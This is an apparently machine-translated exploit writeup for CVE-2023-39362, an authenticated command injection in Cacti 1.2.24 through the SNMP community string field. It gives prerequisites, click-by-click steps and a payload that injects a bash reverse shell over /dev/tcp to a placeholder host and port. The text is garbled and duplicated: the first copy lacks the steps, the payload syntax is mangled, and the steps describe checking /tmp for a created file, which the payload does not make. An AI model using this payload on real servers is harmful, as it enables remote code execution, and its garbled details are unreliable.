#利用title:仙人掌1.2.24-使用SNMP选项时身份验证的命令注入
#日期: 2023-07-03
#利用作者: Antonio Francesco Sardella
#供应商homepage3360 https://www.cacti.net/
#软件link: https://www.cacti.net/info/downloads
#版本:仙人掌1.2.24
#测试在:仙人掌1.2.24上安装在'ph:7.4.33-apache'docker容器上
#CVE: CVE-2023-39362
#类别: WebApps
#原始安全咨询: https://github.com/cacti/cacti/security/advisories/ghsa-g6ff-58cj-x3cp
#示例脆弱的应用程序: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application
#漏洞发现并报告了: Antonio Francesco Sardella
====================================================================================================================
仙人掌1.2.24-使用SNMP选项(CVE-2023-39362)时身份验证的命令注入
====================================================================================================================
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
执行摘要
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
在仙人掌1.2.24中,在某些条件下,身份验证的特权用户可以在设备的SNMP选项中使用恶意字符串,执行命令注入并在基础服务器上获得远程代码执行。
---------
开发
---------
先决条件:
exploit:的示例
民众\' ; bash -c'exec bash -i/dev/tcp/host/port 1'; \'
可以使用类似的利用来编辑现有设备,并具有相同的先决条件,并等待投票程序运行。可能有必要使用不涉及SNMP的项目更改“可用性/可及性选项”部分下“降低设备检测”字段的内容(因为恶意有效载荷可能会破坏与主机的交互)。
-----------
根本原因
-----------
A detailed root cause of the vulnerability is available in the original security advice (https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp) or in my blog post (https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html).
-----------
参考
-----------
-https://github.com/cacti/cacti/security/advisories/ghsa-g6ff-58cj-x3cp
-https://m3ssap0.github.io/articles/cacti_authenticated_command_invoction_snmp.html
-https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application
#日期: 2023-07-03
#利用作者: Antonio Francesco Sardella
#供应商homepage3360 https://www.cacti.net/
#软件link: https://www.cacti.net/info/downloads
#版本:仙人掌1.2.24
#测试在:仙人掌1.2.24上安装在'ph:7.4.33-apache'docker容器上
#CVE: CVE-2023-39362
#类别: WebApps
#原始安全咨询: https://github.com/cacti/cacti/security/advisories/ghsa-g6ff-58cj-x3cp
#示例脆弱的应用程序: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application
#漏洞发现并报告了: Antonio Francesco Sardella
====================================================================================================================
仙人掌1.2.24-使用SNMP选项(CVE-2023-39362)时身份验证的命令注入
====================================================================================================================
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
执行摘要
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
在仙人掌1.2.24中,在某些条件下,身份验证的特权用户可以在设备的SNMP选项中使用恶意字符串,执行命令注入并在基础服务器上获得远程代码执行。
---------
开发
---------
先决条件:
- 攻击者已进行身份验证。
- 攻击者的特权允许管理设备和/或图形,例如“站点/设备/数据”,“图形”。
- 可以使用支持SNMP的设备。
- 可以使用Net-SNMP图。
exploit:的示例
- 转到'Console'“创建”“新设备”。
- 创建支持SNMP版本1或2的设备。
- 确保该设备具有带有一个或多个模板的:的图形
- 'Net -SNMP-组合SCSI磁盘字节'
- 'net -snmp-合并的SCSI磁盘I/O'
- (从模板“ Net-SNMP设备”创建设备将满足图形先决条件)
- 在“ SNMP选项”中,对于“ SNMP社区字符串”字段,使用类似于this:的值
- 单击“创建”按钮。
- 在/TMP下检查创建文件的存在。
民众\' ; bash -c'exec bash -i/dev/tcp/host/port 1'; \'
可以使用类似的利用来编辑现有设备,并具有相同的先决条件,并等待投票程序运行。可能有必要使用不涉及SNMP的项目更改“可用性/可及性选项”部分下“降低设备检测”字段的内容(因为恶意有效载荷可能会破坏与主机的交互)。
-----------
根本原因
-----------
A detailed root cause of the vulnerability is available in the original security advice (https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp) or in my blog post (https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html).
-----------
参考
-----------
-https://github.com/cacti/cacti/security/advisories/ghsa-g6ff-58cj-x3cp
-https://m3ssap0.github.io/articles/cacti_authenticated_command_invoction_snmp.html
-https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application